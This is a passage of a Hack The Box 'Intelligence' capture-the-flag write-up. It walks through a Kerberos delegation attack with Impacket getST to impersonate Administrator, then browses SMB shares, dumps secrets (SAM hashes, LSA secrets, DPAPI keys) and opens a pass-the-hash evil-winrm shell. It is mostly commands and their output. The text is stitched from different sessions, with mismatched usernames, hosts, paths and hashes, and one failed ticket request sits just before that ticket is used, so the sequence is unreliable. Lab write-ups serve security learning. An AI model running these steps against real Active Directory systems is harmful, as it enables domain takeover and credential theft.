root@Raj:~/HTB/Intelligence/newLdapDump$ getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

It gives me error for the clock skew which is normal if you are familiar with Active Directory you just have to sync time between the server and machine. So let’s use ntpdate to do that. if you don’t have ntpdate you can install it using

sudo apt-get install ntpdate

then run the command

sudo ntpdate <MACHINE IP>

Now the clock skew has been fixed let’s try silver ticket attack again. If the time doesn’t change try the following

sudo apt-get install chrony
sudo timedatectl set-ntp true
sudo ntpdate <machine IP>

And

Prevent VirtualBox Guest Syncing Time with Host

Luckily the the Virtualbox user manual, of all things, does contain a solution under the Disabling the Guest Additions time synchronization heading:

Once installed and started, the VirtualBox Guest Additions will try to synchronize the guest time with the host time. This can be prevented by forbidding the guest service from reading the host clock:
VBoxManage setextradata "VM name" "VBoxInternal/Devices/VMMDev/0/Config/GetHostTimeDisabled" 1
To run the above command open CMD.exe as Administrator.

Navigate to the VirtualBox folder on your machine

cd C:\Program Files\Oracle\VirtualBox
Then enter the command as seen above (replacing VM name with the name of the virtual machine you wish to effect).

The guest will now not sync with the host and should have the right time/date set by the NTP daemon (as long as you have the right Region/Location set in Settings).

And now run the command

root@Raj:~/HTB/Intelligence$ getST.py intelligence.htb/svc_int$  -spn WWW/dc.intelligence.htb -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for user
[*] Impersonating Administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache

Now let’s use that ticket to authenticate.

┌──(kali㉿puckie)-[~/htb/intelligence]
└─$ impacket-getST intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :5e47bac787e5e1970cf9acdb5b316239 -impersonate Administrator
Impacket v0.9.23.dev1+20210504.123629.24a0ae6f - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for user
Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)

┌──(kali㉿puckie)-[~/htb/intelligence]
└─$ export KRB5CCNAME=Administrator.ccache

┌──(kali㉿puckie)-[~/htb/intelligence]
└─$ smbclient.py -k intelligence.htb/Administrator@dc.intelligence.htb -no-pass
Impacket v0.9.23.dev1+20210504.123629.24a0ae6f - Copyright 2020 SecureAuth Corporation

Type help for list of commands
# dir
*** Unknown syntax: dir
# ls
[-] No share selected
# shares
ADMIN$
C$
IPC$
IT
NETLOGON
SYSVOL
Users
# use Users
# cd Administrator
# cd Desktop
# ls
drw-rw-rw- 0 Sun Apr 18 20:51:57 2021 .
drw-rw-rw- 0 Sun Apr 18 20:51:57 2021 ..
-rw-rw-rw- 282 Sun Apr 18 20:40:10 2021 desktop.ini
-rw-rw-rw- 34 Sun Oct 24 16:21:15 2021 root.txt
# get root.txt
#

So now we root so let’s get all the flags

┌─[puck@parrot-lt]─[~/htb/forest]
└──╼ $python3 secretsdump.py puck@dc.intelligence.htb
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xcae14f646af6326ace0e1f5b8b4146df
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0054cc2f7ff3b56d9e47eb39c89b521f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
intelligence\DC$:aes256-cts-hmac-sha1-96:ef69aec3a0800ea87494d300dbdb5e10804669185c8f9829c24446e8300faf56
intelligence\DC$:aes128-cts-hmac-sha1-96:27c6f98a10b4e70e03c29ccfe09df2b5
intelligence\DC$:des-cbc-md5:679b8670d6c49885
intelligence\DC$:plain_password_hex:6fb7ec8f3b653eb57df51613799aea4d4b7c80752176239a90056ede6993a4ff5972d9e05c0071e295c3b68ee3a14a52956abdd6abfa57af4cb496aa385736c5ac895db24a54b7bac7faaa891d545add05e0086f049a525a47cfb1229226ece995b4892db30d0f66902b9ed0b8503ba1a5558d4d08be929bee7e69f9f13acdba6aaf73322f2c625b9f31e7344dd9545b668da2bb9bb2fafd4250a321982956a389a4d9ae7feffb8b910315cb6de1adcc99f377f0ad3be01e2644536486dd7b9287f5086257a747a39b5c1985ad3de2ce6fff756a32ad8f07cef0735c243b64e5ea5b19e207b37c638bd82f88e05cc77b
intelligence\DC$:aad3b435b51404eeaad3b435b51404ee:2554016426dba8b5e25a09b630fbde1a:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xc3430503ab11d38db01911c159fe940bd8ec7cdb
dpapi_userkey:0x43fdd77605cdb58e14fb6a5c90c976fde8f4f2ea
[*] NL$KM 
--snip--
┌─[✗]─[puck@parrot-lt]─[~/htb/intelligence]
└──╼ $evil-winrm -u administrator -i dc.intelligence.htb -H 9075113fe16cf74f7c0f9b27e882dad3

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>

.

 

Protected: htb-seal-private

This content is password protected. To view it please enter your password below:

Posted on